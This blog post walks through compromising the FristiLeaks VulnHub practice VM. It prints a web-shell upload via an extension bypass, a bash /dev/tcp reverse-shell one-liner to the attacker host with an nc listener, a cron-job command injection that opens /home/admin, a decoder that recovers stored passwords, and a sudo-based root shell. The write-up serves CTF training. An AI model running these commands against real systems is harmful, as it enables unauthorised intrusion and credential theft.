Mr_H4sh

Infosec, CTF and more

FristiLeaks Solution

Hi guys,

This Christmas I had the opportunity to catch up with the latest VMs on Vulnhub.

In this post I’m going to show you how to solve the FristiLeaks VM provided by Ar0xA.

Thanks to Vulnhub for keeping me busy with all these challenges, and thanks to everyone that hosts new challenges.

This challenge involves various hacking techniques and privilege escalation.

First step: INFORMATION GATHERING

The description provided on Vulnhub says that the machine will have an IP assigned automatically, so this is the situation:

192.168.56.102 <== attacker
192.168.56.101 <== victim

A port scan on the victim host gives this:

# nmap -sT -p -v -n -Pn 192.168.56.101 -T5

Nmap scan report for 192.168.56.101
Host is up (0.00073s latency).
Not shown: 65534 filtered ports
PORT   STATE SERVICE
80/tcp open  http

The only open port is the port 80/tcp, so I have a look and this is what I find:

fristi-welcome

Second step: VULNERABILITY SCAN

I spider the website with Burp Suite and I find that there’s a hidden robots.txt file, but all the links in there are returning the same image which says that the provided url is not what I’m looking for.

The index page says Keep calm and drink Fristi, and all the links in the robots.txt file are names of drinks, so I try http://192.168.56.101/fristi, and this is what I find:

fristi-admin-portal

The source code has the following content:

<!-- 
TODO:
We need to clean this up for production. I left some junk in here to make testing easier.

- by eezeepz
-->

[ html code cut on purpose ]

<!-- "data:img/png;base64, 
iVBORw0KGgoAAAANSUhEUgAAAW0AAABLCAIAAAA04UHqAAAAAXNSR0IArs4c6QAAAARnQU1BAACx
jwv8YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAAARSSURBVHhe7dlRdtsgEIVhr8sL8nqymmwmi0kl
S0iAQGY0Nb01//dWSQyTgdxz2t5+AcCHHAHgRY4A8CJHAHiRIwC8yBEAXuQIAC9yBIAXOQLAixw
B4EWOAPAiRwB4kSMAvMgRAF7kCAAvcgSAFzkCwIscAeBFjgDwIkcAeJEjALzIEQBe5AgAL5kc+f
m63yaP7/XP/5RUM2jx7iMz1ZdqpguZHPl+zJO53b9+1gd/0TL2Wull5+RMpJq5tMTkE1paHlVXJJ
Zv7/d5i6qse0t9rWa6UMsR1+WrORl72DbdWKqZS0tMPqGl8LRhzyWjWkTFDPXFmulC7e81bxnNOvb
DpYzOMN1WqplLS0w+oaXwomXXtfhL8e6W+lrNdDFujoQNJ9XbKtHMpSUmn9BSeGf51bUcr6W+VjNd
jJQjcelwepPCjlLNXFpi8gktXfnVtYSd6UpINdPFCDlyKB3dyPLpSTVzZYnJR7R0WHEiFGv5NrDU
12qmC/1/Zz2ZWXi1abli0aLqjZdq5sqSxUgtWY7syq+u6UpINdOFeI5ENygbTfj+qDbc+QpG9c5
uvFQzV5aM15LlyMrfnrPU12qmC+Ucqd+g6E1JNsX16/i/6BtvvEQzF5YM2JLhyMLz4sNNtp/pSkg1
04VajmwziEdZvmSz9E0YbzbI/FSycgVSzZiXDNmS4cjCni+kLRnqizXThUqOhEkso2k5pGy00aLq
i1n+skSqGfOSIVsKC5Zv4+XH36vQzbl0V0t9rWb6EMyRaLLp+Bbhy31k8SBbjqpUNSHVjHXJmC2Fg
tOH0drysrz404sdLPW1mulDLUdSpdEsk5vf5Gtqg1xnfX88tu/PZy7VjHXJmC21H9lWvBBfdZb6Ws
30oZ0jk3y+pQ9fnEG4lNOco9UnY5dqxrhk0JZKezwdNwqfnv6AOUN9sWb6UMyR5zT2B+lwDh++Fl
3K/U+z2uFJNWNcMmhLzUe2v6n/dAWG+mLN9KGWI9EcKsMJl6o6+ecH8dv0Uu4PnkqDl2rGuiS8HK
ul9iMrFG9gqa/VTB8qORLuSTqF7fYU7tgsn/4+zfhV6aiiIsczlGrGvGTIlsLLhiPbnh6KnLDU12q
mD+0cKQ8nunpVcZ21Rj7erEz0WqoZ+5IRW1oXNB3Z/vBMWulSfYlm+hDLkcIAtuHEUzu/l9l867X34
rPtA6lmLi0ZrqX6gu37aIukRkVaylRfqpk+9HNkH85hNocTKC4P31Vebhd8fy/VzOTCkqeBWlrrFhe
EPdMjO3SSys7XVF+qmT5UcmT9+Ss//fyyOLU3kWoGLd59ZKb6Us10IZMjAP5b5AgAL3IEgBc5AsCLH
AHgRY4A8CJHAHiRIwC8yBEAXuQIAC9yBIAXOQLAixwB4EWOAPAiRwB4kSMAvMgRAF7kCAAvcgSAFzk
CwIscAeBFjgDwIkcAeJEjALzIEQBe5AgAL3IEgBc5AsCLHAHgRY4A8Pn9/QNa7zik1qtycQAAAABJR
U5ErkJggg=="-->

Thank you eezeepz, this really makes the ‘testing easier’.

Since the image shown on the page is in base64 and the one below is commented, I download the page and I uncomment the commented image.

It comes out the following image:

fristi-eezeepz-password

This is eezeepz’s login password, so I login and I find a page that allows me to upload a file.

Third step: EXPLOITATION

I make a test and I find out that the page allows just png, gig and jpg files, but the check is just of the extension, and it stores it into /uploads folder.

So, I prepare my trusted b374k web shell and I upload it changing the extension to .png, and this is what happens when I open http://192.168.56.101/uploads/myShell.php.png:

b374k-web-shell

First thing, I open a reverse shell on my local on port 443, since for me it is more convenient than to start wandering around on a browser:

On a local terminal:

# nc -l -v -p 443

On the remote shell:

$ /bin/bash -i >& /dev/tcp/192.168.56.102/443 0&>1

And so I’m in as user apache.

Fourth step: PRIVILEGE ESCALATION

I notice the file /var/www/notes.txt whose content gives me a clue to go to check something on the home directory of the user eezeepz.

I go to eezeepz home folder and I notice the file /home/eezeepz/notes.txt with the following content:

Yo EZ,

I made it possible for you to do some automated checks, 
but I did only allow you access to /usr/bin/* system binaries. I did
however copy a few extra often needed commands to my 
homedir: chmod, df, cat, echo, ps, grep, egrep so you can use those
from /home/admin/

Don't forget to specify the full path for each binary!

Just put a file called "runthis" in /tmp/, each line one command. The 
output goes to the file "cronresult" in /tmp/. It should 
run every minute with my account privileges.

- Jerry

So, as far as I understand I have to create the file /tmp/runthis, and it will be run from a privileged user. Ideal.

I find out that the privileged user is admin, and the command that can be run into the /tmp/runthis file can only start with either /home/admin or /usr/bin, so I create a script that runs a command from /usr/bin and I append a command to set the folder /home/admin accessible by everybody.

echo "/usr/bin/whoami && chmod -R 777 /home/admin" > /tmp/runthis

I wait a minute and check the permissions on the folder /home/admin, and it’s now accessible by everybody.

The folder contains several files, and the ones that get my attention are cryptedpass.txt, whoisyourgodnow.txt, and cryptpass.py.

The first two files contains hashed passwords, and the third file is a script that hashes the passwords:

# cat cryptpass.py

import base64,codecs,sys

def encodeString(str):
    base64string= base64.b64encode(str)
    return codecs.encode(base64string[::-1], 'rot13')

cryptoResult=encodeString(sys.argv[1])
print cryptoResult

The script encrypts a given string the in base64 and the in rot13.

So, I write a script to decrypt a given string:

import base64,codecs,sys

def decodeString(str):
    base64string = codecs.decode(str, 'rot13')
    return base64.b64decode(base64string[::-1])

decryptedResult=decodeString(sys.argv[1])
print decryptedResult

And these are the decrypted passwords:

admin : thisisalsopw123
fristigod : LetThereBeFristi!

I login as fristigod, but the user can’t become root on the machine. So, I access to the folder /var/fristigod, and I have a look at the .bash_history file:

ls
pwd
ls -lah
cd .secret_admin_stuff/
ls
./doCom 
./doCom test
sudo ls
exit
cd .secret_admin_stuff/
ls
./doCom 
sudo -u fristi ./doCom ls /
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom ls /
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom ls /
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
sudo /var/fristigod/.secret_admin_stuff/doCom
exit
sudo /var/fristigod/.secret_admin_stuff/doCom
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
groups
ls -lah
usermod -G fristigod fristi
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
less /var/log/secure e
Fexit
exit
exit

Looks like that the guy was running some commands as user fristi via the file /var/fristigod/.secret_admin_stuff/doCom, so I run the following command to spawn a root shell:

sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom /bin/sh

sh-4.1# whoami
whoami
root

Excellent, I’m root. Time to get the flag.

sh-4.1# ls -l /root
ls -l
total 4
-rw-------. 1 root root 246 Nov 17 12:19 fristileaks_secrets.txt
sh-4.1# cat /root/fristileaks_secrets.txt
cat /root/fristileaks_secrets.txt
Congratulations on beating FristiLeaks 1.0 by Ar0xA [https://tldr.nu]

I wonder if you beat it in the maximum 4 hours it's supposed to take!

Shoutout to people of #fristileaks (twitter) and #vulnhub (FreeNode)


Flag: Y0u_kn0w_y0u_l0ve_fr1st1

Conclusion

As usual, for any information or comment, please do not hesitate to leave a comment.

./A